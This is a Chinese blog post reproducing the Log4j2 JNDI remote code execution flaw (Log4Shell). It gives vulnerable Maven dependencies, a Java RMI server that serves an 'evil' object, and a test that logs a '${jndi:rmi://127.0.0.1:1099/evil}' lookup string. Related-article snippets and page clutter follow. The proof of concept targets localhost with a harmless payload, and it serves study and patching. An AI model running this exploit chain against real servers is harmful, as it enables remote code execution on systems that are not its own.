Log4j2版本2.5之前的漏洞复现

最新推荐文章于 2024-04-16 07:48:07 发布
最新推荐文章于 2024-04-16 07:48:07 发布
阅读量1.4k 收藏 2
点赞数
文章标签: 服务器 apache java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiangyafu0/article/details/121903564
版权

1.依赖

// 2.15.0
<dependency>
    <groupId>org.slf4j</groupId>
    <artifactId>slf4j-api</artifactId>
    <version>2.14.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.0</version>
</dependency>

2.恶意服务代码

package com.jay.rmi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIserver {
	public static void main(String[] args) {
		try {
			LocateRegistry.createRegistry(1099);
			Registry registry = LocateRegistry.getRegistry();

			System.out.println("create RMI register on port 1099 ");
			Reference reference = new Reference("EvilObj","EvilObj", null); // "http://127.0.0.1:80/"
			ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
			registry.bind("evil",referenceWrapper);
		} catch (Exception e){
			e.printStackTrace();
		}
	}
}

package com.jay.rmi;

public class EvilObj {
	static {
		System.out.println("我是jay");
	}
}

3.测试

package com.jay;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {
	private static final Logger LOGGER = LogManager.getLogger();

	public static void main(String[] args) {
        // 以下三行低版本jdk不需要
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
		System.setProperty("java.rmi.server.useCodebaseOnly","false");

		String userName = "${jndi:rmi://127.0.0.1:1099/evil}";
		// String userName = "${java:os}";
		// String userName = "${java:vm}";
		LOGGER.info("hello, {}!", userName);
	}
}

先开启RMIserver
在运行Log4jTest

结果 ${java:os} 2.14打印以下内容, 2.15无法打印。

2021-12-13 13:42:00.003 [main] INFO [Log4jTest:22] - hello, Windows 10 10.0, architecture: amd64-64!

Process finished with exit code 0

具体大家可以试试自己测试。

总结

把版本升级至2.15或者把jdk版本升高即可暂时修复此问题。

名字叫jay
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
log4j2版本漏洞 修复版本2.16.0
12-17
log4j2版本漏洞 修复版本2.16.0
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4551
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1247
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新网络安全性能优化最佳实践
最新发布
2401_83739777的博客
04-16 1033
Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;Apache Log4j2是 Log4j的升级版本,据分析,该漏洞产生的原因在于Log4j在记录日志的过程中会对日志内容进行判断,如果内容中包含了${,则Log4j会认为此字符属于可替换的变量,并且Log4j支持JNDI远程加载的方式替换变量值。
Log4j2中2.16.0版漏洞(CVE-2021-45105)原理、复现步骤和修复方法(2.17.0修复原理)
跳小闹成长记
12-22 5736
好不容易2.16.0发布之后,Log4j2官方,又突然发布了2.17.0版本,原因想必大家通过各种号推送都已经知道了。因为在2.16.0版本上发现了一个新的漏洞,该漏洞可能会导致DoS(Denial of Service)攻击。那这个漏洞到底是怎么回事呢?它会有哪些影响呢?今天咱们就一起来深度学习下该漏洞相关原理和攻击步骤。
Log4j2漏洞详解(自学)
m0_64481831的博客
03-05 1410
Log4j2Apache下的流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标,被应用于业务系统开发,用于记录程序输入输出日志信息。Log4j2Apache的日志框架,用来记录和管理日志信息的。Log4j2漏洞的原理是因为默认支持解析LDAP/RMI协议,且使用了占位符如{},并会解析里面的内容进行替换,所以攻击者就可以利用这一点构建特殊的恶意的占位符来进行攻击。
Log4j2 远程代码执行漏洞(cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6096
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
log4j-2.6.2完整jar
04-24
log4j-2.6.2完整jar 都来看看,很实用,我查找资源费了很大劲,分享一下
log4j-core-2.5
02-21
log4j-core-2.5.jar、slf4j-api-1.7.18.jar、slf4j-log4j12-1.7.18.jar
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2419
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
核弹级漏洞,我把log4j底裤都给扒了
MachineGunJoe666
12-12 1067
大家好,我是周杰伦。 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂**:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事!** log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,
日志框架Log4j
qq_21344887的博客
09-06 191
日志
Log4j2 - java.lang.NoSuchMethodError: com.lmax.disruptor.dsl.Disruptor
不积跬步,无以至千里
01-02 6071
问题 项目使用了log4j2,由于使用了全局异步打印日志的方式,还需要引入disruptor的依赖,最后使用的log4j2和disruptor的版本依赖如下: &lt;dependency&gt; &lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt; &lt;artifactId&gt;log4j-core&lt;/arti...
log4j2源码解析(2.2版本
茄子的博客
07-20 1792
目的 搞懂下面这两行代码到底是怎么打印出日志的 private static final Logger logger=Logger.getLogger(Log4j2Test.class); logger.info(“log4j info”); 完整代码如下 public class Log4j2Test { private static final Logger logger = LogManager.getLogger(Log4j2Test.class); public static v
log4j2版本推荐使用2.6以上
绅士jiejie的博客
02-20 2229
因为log4j2从2.6版本开始,默认情况下以“无垃圾”模式运行,通过重用对象和缓冲区,尽可能的不分配临时对象,降低了GC频率。
log4j2漏洞在线复现
10-05
log4j2是一个Java日志框架,用于记录应用程序的日志信息。它具有广泛的应用,但最近发现了一个远程代码执行漏洞(CVE-2021-44228)。该漏洞允许攻击者通过恶意构造的日志信息来执行任意代码。 要在线复现log4j2漏洞,您可以按照以下步骤进行操作: 1. 编写一个Java类,包含恶意代码,例如上述提供的POC。 2. 确保您的Java环境中安装了受漏洞影响的log4j2版本。 3. 运行该Java类,并触发日志记录操作。 4. 检查DNSLog平台或其他相关工具,以查看是否有恶意代码的执行回显。 请注意,在执行漏洞复现之前,确保您已经获得合法授权,并遵守法律和道德准则。漏洞复现仅用于安全研究和教育目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值